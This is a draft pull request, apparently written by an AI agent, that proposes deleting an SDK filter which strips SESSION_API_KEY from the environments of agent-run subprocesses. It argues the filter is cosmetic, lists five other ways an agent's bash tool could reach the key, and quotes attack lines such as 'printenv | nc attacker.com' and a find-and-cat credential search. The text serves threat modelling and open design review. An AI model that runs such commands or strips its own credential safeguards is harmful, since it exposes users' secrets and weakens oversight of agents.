### PR TITLE
remove _SENSITIVE_ENV_VARS filter from sanitized_env (cosmetic only)

### DIFF
--- a/openhands-sdk/openhands/sdk/utils/command.py
+++ b/openhands-sdk/openhands/sdk/utils/command.py
@@ -12,12 +12,6 @@ from openhands.sdk.utils.redact import redact_text_secrets
 logger = get_logger(__name__)
 
 
-# Env vars that should not be exposed to subprocesses (e.g., bash commands
-# executed by the agent). These credentials allow access to user secrets via
-# the SaaS API and must remain isolated to the SDK's Python process.
-_SENSITIVE_ENV_VARS = frozenset({"SESSION_API_KEY"})
-
-
 def sanitized_env(
     env: Mapping[str, str] | None = None,
 ) -> dict[str, str]:
@@ -26,10 +20,6 @@ def sanitized_env(
     PyInstaller-based binaries rewrite ``LD_LIBRARY_PATH`` so their vendored
     libraries win. This function restores the original value so that subprocess
     will not use them.
-
-    Sensitive environment variables (e.g., ``SESSION_API_KEY``) are stripped
-    to prevent LLM-driven agents from accessing credentials via terminal
-    commands.
     """
 
     base_env: dict[str, str]
@@ -37,10 +27,6 @@ def sanitized_env(
         base_env = dict(os.environ)
     else:
         base_env = dict(env)
-
-    # Strip sensitive env vars to prevent agent access via bash commands
-    for key in _SENSITIVE_ENV_VARS:
-        base_env.pop(key, None)
 
     if "LD_LIBRARY_PATH_ORIG" in base_env:
         origin = base_env["LD_LIBRARY_PATH_ORIG"]


### PR DESCRIPTION
> 🚧 **Draft — opening for discussion, not for merge.** The agent-server team should weigh in on whether to (a) accept this removal, (b) tighten the filter properly, or (c) replace it with a real boundary. See "What this PR does NOT do" below.

## TL;DR

`sanitized_env()` strips `SESSION_API_KEY` from the env of every subprocess as a defense-in-depth measure against the LLM-driven bash tool exfiltrating the agent-server's session credential. **The filter does not achieve that goal**, breaks legitimate consumers (most visibly the automation preset scripts), and creates cross-purposes between the SDK and the dispatching layer. I propose we delete it.

If a real boundary against credential exfiltration is desired, the correct design is a per-run scoped capability token — out of scope for this PR.

## What the filter does today

```python
# openhands-sdk/openhands/sdk/utils/command.py
_SENSITIVE_ENV_VARS = frozenset({"SESSION_API_KEY"})

def sanitized_env(env=None):
    ...
    for key in _SENSITIVE_ENV_VARS:
        base_env.pop(key, None)
    ...
```

The intent (per the docstring and the commit that introduced it in #2490) is to prevent an LLM-driven `bash` tool call like `printenv | nc attacker.com` from capturing the credential that grants full access to the user's secrets, LLM config, and ability to start conversations on their behalf.

## Why it doesn't work

The exact same secret value is reachable via at least five other channels that the filter does not touch:

| # | Channel | Why the filter misses it |
|---|---|---|
| 1 | `OH_SESSION_API_KEYS_0` env var | Agent-server V1 config sets this to the same key. Not in `_SENSITIVE_ENV_VARS`. |
| 2 | `OH_INTERNAL_SERVER_URL` env var | Tells the attacker exactly where to send the captured key. Not filtered. |
| 3 | Persisted file under `~/.openhands/agent-canvas/session-api-key.txt` (and similar paths) | Readable by any subprocess running as the same user. |
| 4 | `/proc/<agent-server-pid>/environ` | Linux exposes the unfiltered parent env to anything running in the same container as the same user. |
| 5 | `ps -eo command` / `/proc/<pid>/cmdline` | Any process launched with `--session-api-key <value>` style args leaks via process listings. |

In a one-shot prompt the LLM-driven bash tool can find the key via channel 1 with `printenv | grep -i session`, or via channel 3 with `find ~/.openhands -name '*key*' -exec cat {} \;`. The filter raises the cost from "trivial" to "trivial-and-thirty-seconds-of-prompting".

## How it actively harms the system

- **Breaks automation preset scripts.** [`OpenHands/automation`'s `sdk_main.py`](https://github.com/OpenHands/automation/blob/main/openhands/automation/presets/prompt/sdk_main.py) reads `SESSION_API_KEY` to authenticate back to the agent-server. Whenever a run goes through `agent-server/bash_service.py`'s `env=sanitized_env()` call, the credential is stripped and `RemoteWorkspace(...)` fails authentication. The automation team is having to work around this by reading from `OH_SESSION_API_KEYS_0` instead (see [`OpenHands/automation#124`](https://github.com/OpenHands/automation/pull/124)).
- **Creates cross-purposes between layers.** `openhands.automation.execution._dispatch_in_context` explicitly injects `export SESSION_API_KEY=…` *inside the bash command string* — i.e. the dispatching layer is undoing the SDK's filter on every automation run, because the dispatcher knows the filter prevents legitimate work. Two layers of the same project disagreeing about whether this var is safe is a smell.
- **Confuses readers into believing there's a security boundary** where there isn't one. The docstring claims credentials are "isolated to the SDK's Python process". In a shared-container deployment that claim is false.

## What this PR does

- Remove the `_SENSITIVE_ENV_VARS` frozenset.
- Remove the loop that strips its members.
- Remove the docstring sentence claiming credentials are stripped.
- Leave `LD_LIBRARY_PATH` handling (the original PyInstaller-related purpose of `sanitized_env`) untouched.

Net diff: **14 lines removed, 1 file**. All existing `tests/sdk/utils/test_command.py` tests pass — they only exercise the `LD_LIBRARY_PATH` behaviour, which is unchanged.

## What this PR does NOT do

It does **not** add a real boundary. If the agent-server team believes the threat is real (which is reasonable: a hostile prompt today *can* impersonate the user via the agent-server REST API), the right design is something like:

- The trusted dispatcher (agent-server / automation) mints a **per-run, time-bounded, scope-limited capability token** when starting a conversation or automation run.
- The token is what the in-sandbox script and the agent's bash tool see — not the user's master session key.
- The agent-server validates scopes on every request: e.g. "this token can POST `/api/automation/{run_id}/complete` and GET `/api/automation/{run_id}/llm-config` but cannot start arbitrary new conversations or list secrets".
- The token dies when the run ends or the conversation closes.

That design changes "an LLM that escapes the sandbox boundary can do anything the user can do" into "an LLM that escapes the sandbox boundary can do *only what this run needed to do*", which is the actual property the current filter is gesturing at. It is, however, an architectural change that touches the agent-server, the SDK, and the automation dispatcher — far beyond what `sanitized_env()` can deliver.

## Options for the reviewer

1. **Merge this PR.** Accept that the filter is cosmetic; rely on the dispatching layer to be careful and on follow-up work for a real boundary.
2. **Reject this PR and tighten the filter** to also strip `OH_SESSION_API_KEYS_0`, `OH_INTERNAL_SERVER_URL`, and audit the persisted-file + `/proc` channels. (Closes 1–2 of the leaks; still doesn't help with file + procfs without OS-level isolation.)
3. **Reject this PR and pursue the capability-token design.** Filter stays in place during the transition as a marker.

My preference is **option 1 now, option 3 next**, but I'm opening this as a draft specifically so the agent-server team can push back if I'm missing context about what the filter was actually protecting against.

## Related work

- [`OpenHands/automation#124`](https://github.com/OpenHands/automation/pull/124) — switches preset `sdk_main.py` to read `OH_SESSION_API_KEYS_0` so automations work even with the filter in place. Independent of this PR; the automation change is the right fix regardless of how this conversation lands.
- [`OpenHands/agent-canvas#603`](https://github.com/OpenHands/agent-canvas/pull/603) — fixes dev:docker plumbing so the automation-preset code path is actually reachable in local development. Surfaced the present discussion.

---

_This PR was created by an AI agent (OpenHands) on behalf of a user who hit this filter while debugging automation runs in `dev:docker`. The threat-model analysis is the agent's; please challenge it if I've got something wrong._

<!-- AGENT_SERVER_IMAGES_START -->
---
**Agent Server images for this PR**

• **GHCR package:** https://github.com/OpenHands/agent-sdk/pkgs/container/agent-server

**Variants & Base Images**
| Variant | Architectures | Base Image | Docs / Tags |
|---|---|---|---|
| java | amd64, arm64 | `eclipse-temurin:17-jdk` | [Link](https://hub.docker.com/_/eclipse-temurin:17-jdk) |
| python | amd64, arm64 | `nikolaik/python-nodejs:python3.13-nodejs22-slim` | [Link](https://hub.docker.com/_/nikolaik/python-nodejs:python3.13-nodejs22-slim) |
| golang | amd64, arm64 | `golang:1.21-bookworm` | [Link](https://hub.docker.com/_/golang:1.21-bookworm) |


**Pull (multi-arch manifest)**
```bash
# Each variant is a multi-arch manifest supporting both amd64 and arm64
docker pull ghcr.io/openhands/agent-server:97175b8-python
```

**Run**
```bash
docker run -it --rm \
  -p 8000:8000 \
  --name agent-server-97175b8-python \
  ghcr.io/openhands/agent-server:97175b8-python
```

**All tags pushed for this build**
```
ghcr.io/openhands/agent-server:97175b8-golang-amd64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-golang-amd64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-golang-amd64
ghcr.io/openhands/agent-server:97175b8-golang_tag_1.21-bookworm-amd64
ghcr.io/openhands/agent-server:97175b8-golang-arm64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-golang-arm64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-golang-arm64
ghcr.io/openhands/agent-server:97175b8-golang_tag_1.21-bookworm-arm64
ghcr.io/openhands/agent-server:97175b8-java-amd64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-java-amd64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-java-amd64
ghcr.io/openhands/agent-server:97175b8-eclipse-temurin_tag_17-jdk-amd64
ghcr.io/openhands/agent-server:97175b8-java-arm64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-java-arm64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-java-arm64
ghcr.io/openhands/agent-server:97175b8-eclipse-temurin_tag_17-jdk-arm64
ghcr.io/openhands/agent-server:97175b8-python-amd64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-python-amd64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-python-amd64
ghcr.io/openhands/agent-server:97175b8-nikolaik_s_python-nodejs_tag_python3.13-nodejs22-slim-amd64
ghcr.io/openhands/agent-server:97175b8-python-arm64
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-python-arm64
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-python-arm64
ghcr.io/openhands/agent-server:97175b8-nikolaik_s_python-nodejs_tag_python3.13-nodejs22-slim-arm64
ghcr.io/openhands/agent-server:97175b8-golang
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-golang
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-golang
ghcr.io/openhands/agent-server:97175b8-golang_tag_1.21-bookworm
ghcr.io/openhands/agent-server:97175b8-java
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-java
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-java
ghcr.io/openhands/agent-server:97175b8-eclipse-temurin_tag_17-jdk
ghcr.io/openhands/agent-server:97175b8-python
ghcr.io/openhands/agent-server:97175b8cbc06679088f8aa526204be2c1e19ab79-python
ghcr.io/openhands/agent-server:openhands-remove-cosmetic-session-api-key-filter-python
ghcr.io/openhands/agent-server:97175b8-nikolaik_s_python-nodejs_tag_python3.13-nodejs22-slim
```

**About Multi-Architecture Support**
- Each variant tag (e.g., `97175b8-python`) is a **multi-arch manifest** supporting both **amd64** and **arm64**
- Docker automatically pulls the correct architecture for your platform
- Individual architecture tags (e.g., `97175b8-python-amd64`) are also available if needed
<!-- AGENT_SERVER_IMAGES_END -->